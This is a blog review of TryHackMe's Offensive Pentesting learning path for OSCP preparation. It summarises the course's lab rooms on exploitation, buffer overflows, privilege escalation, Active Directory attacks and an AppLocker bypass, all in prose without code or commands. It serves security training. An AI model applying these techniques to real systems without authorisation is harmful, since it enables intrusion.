Reviews, Training Labs

TryHackMe – Offensive Pentesting Learning Path Review

February 5, 2021 | by Stefano Lanaro | Leave a comment

Introduction

Offensive Pentesting is one of the learning paths available on the TryHackMe platform. It is primarily designed for students preparing for the Offensive Security Certified Professional certification exam.

It contains both rooms that step the students through the various exploitation steps as well as rooms that aim to simulate a black box penetration test.

The Platform

TryHackMe is an online platform for learning cyber security and penetration testing through hands-on exercises and labs designed to teach practical skills.

I really like the layout of the platform and the way it functions, there are learning paths available you can enroll for which aim to prepare you for a specific certification such as Comptia Pentest+, or in a specific area such as Active Directory.

There are modules on the platform that aim to teach you a specific skill, for example cryptography, whereas others are simply capture the flag challenges. All modules and learning paths are made of individual rooms that can also be joined individually. A handy progress bar is displayed at the top of the page to display the progress of the current module/room.

You have the option to either use your own Kali local virtual machine or to boot up a Kali image and use it through the web platform

Pros

  • The subscription is very affordable, at $10 a month.
  • The machines are not shared across other students.
  • Official forum are available to discuss rooms with other students.
  • Walkthroughs for every room are available in case you are stuck.
  • Some of the rooms do a great job at explaining why certain attacks are being used, and some also have a video of the entire process.

Cons

  • I believe it would be an improvement if all questions had hints available and these would only unlock after a certain amount of time, and the same should apply to walkthroughs, to encourage students to do their own research rather than to rely on hints or walkthroughs.
  • It would be handy if every room or module came with a PDF document containing useful notes from what was covered.
  • The learning path is a great concept and I think it should be used more, as a lot of students treat this platform as a learning environment, rather than just a capture the flag playground, and since there is already a very large amount of rooms available it shouldn’t be too hard to compile them into learning paths to prepare students for certifications.

Getting Started

This section should be fairly easy if you are already familiar with penetration testing or have already had experience with Hack the Box or similar platofrms. It is still interesting nonetheless and as it teaches you how to use the TryHackMeplatform, basic penetration testing concepts and steps of the process, and walks you through a couple of machines where you will have to exploit known vulnerabilities in SMB and ProFTPD

Advanced Exploitation

This section is where things get interesting, as there are nine different rooms where you will get to practice the full penetration testing cycle with different operating systems, services and applications. 

The initial machines will walk you through the entire process step-by-step, including a video walkthrough you can view as you complete the machine, whereas the other ones will simulate a black box scenario, in which all you are provided with is the machine’s IP address and the scope of work. 

This section includes common vectors such as SQL injection, brute force, remote file inclusion and will allow you to explore and practice techniques such as Packet Analysis, SSH Tunneling, privilege escalation.

I also liked the fact that the section covered quite a few privilege escalation vectors such as SUID binaries, sudo scripts/binaries, kernel exploits, Token Impersonation, unquoted service paths, scheduled tasks and others, which is something courses often don’t cover enough.

Although it is not nearly enough to prepare for the OSCP exam by itself and the machines overall are not that difficult, it is definitely a great training resource, especially after you have finished your PWK labs and are looking for a new platform to keep your skills sharp.

Buffer Overflow Exploitation

This room felt a bit redundant to me as I completed it after failing my first OSCP attempt and my stack buffer overflow knowledge was already good enough. Nevertheless, this is hands down one of the best buffer overflow preparation resources out there.

The first room walks you through every step in the buffer overflow exploitation process, especially when it comes to identifying the EIP offset, bad characters, finding your EIP return address etc. which is really useful if you are new to buffer overflow. It also has a bunch of exercises that have you re-iterate these steps over and over again so that you can get familiar with the entire exploitation process.

The subsequent rooms are simply buffer overflow boxes to exploit using a black-box type approach, some of them are known machines that have been implemented in the THM platform (for example Brainpan 1 from Vulnhub and dostackbufferoverflowgood), which makes it a lot easier to boot them up and interact to them rather than having to locally setup a VM.

The only problem I hadwith this section of the course, which is entirely due to me, is that the commands and steps used in the course are different to the ones I learned previously while doing the PWK course (admittedly the ones used in the THM course are easier to learn) and I was so used to the old ones that it was a bit hard for me at first to adapt to the new ones.

Active Directory

Even though Active Directory knowledge isn’t required for the OSCP certification (basic pivoting is covered in the course), it is an essential skill to have when performing penetration tests against Windows systems.

The first room teaches all of the basic theoretical concepts of AD, such as Domain controllers, Forests, Users, Groups, etc. This can be useful if you are not familiar with AD or if you need a refresher on the subject.

The next rooms cover all the common enumeration, privilege escalation steps and basic Active Directory attacks such as Ticket Harvesting, Password Spraying/Brute-forcing, Kerberoasting/AS-REP Roasting, Pass the Ticket etc. It explains in great detail with a step-by-step process how these attacks are performed using common tools such as Powerview, Rubeus, Kerbrute, Impacket, Bloodhound, Server Manager and Mimikatz.

Extra Credit

The first room of this section covers all of the basics of Powershell required to enumerate a given domain controller/group including users, finding hidden files, obtaining information about a command, manipulating commands output (sorting, filtering etc), gathering networking information and active connection/ports, running processes, scheduled tasks and more.

The next room teaches you how to bypass AppLocker, a windows application that allows to restrict which programs users can execute based on the program’s path/publisher/hash and to read the Powershell history command, through which you will gain access to a different user. You then use Kerberoasting to gain further access to another user and run the PowerUp script which suggests administrator base64-encoded passwords are being stored in the C:\Windows\Panther\Unattend\Unattended.xml file.

The next two rooms are black-box penetration tests which I found very interesting, one of which is Mr. Robot from Vulnhub, which I had already done previously and is quite popular already. The other one is a Windows box where you will find RDP credentials in a WordPress site and use a known vulnerability to gain system access.

Conclusion

This learning path was definitely one of the best resources for my OSCP preparation as I signed up for TryHackMe after failing my OSCP exam for the first time and I wish I did this earlier as all of the rooms included in the path contain extremely useful information.